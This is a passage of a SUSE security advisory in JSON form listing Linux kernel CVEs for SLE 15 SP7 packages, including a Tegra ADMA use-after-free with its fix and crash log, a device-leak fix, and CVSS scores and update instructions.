"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71157"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
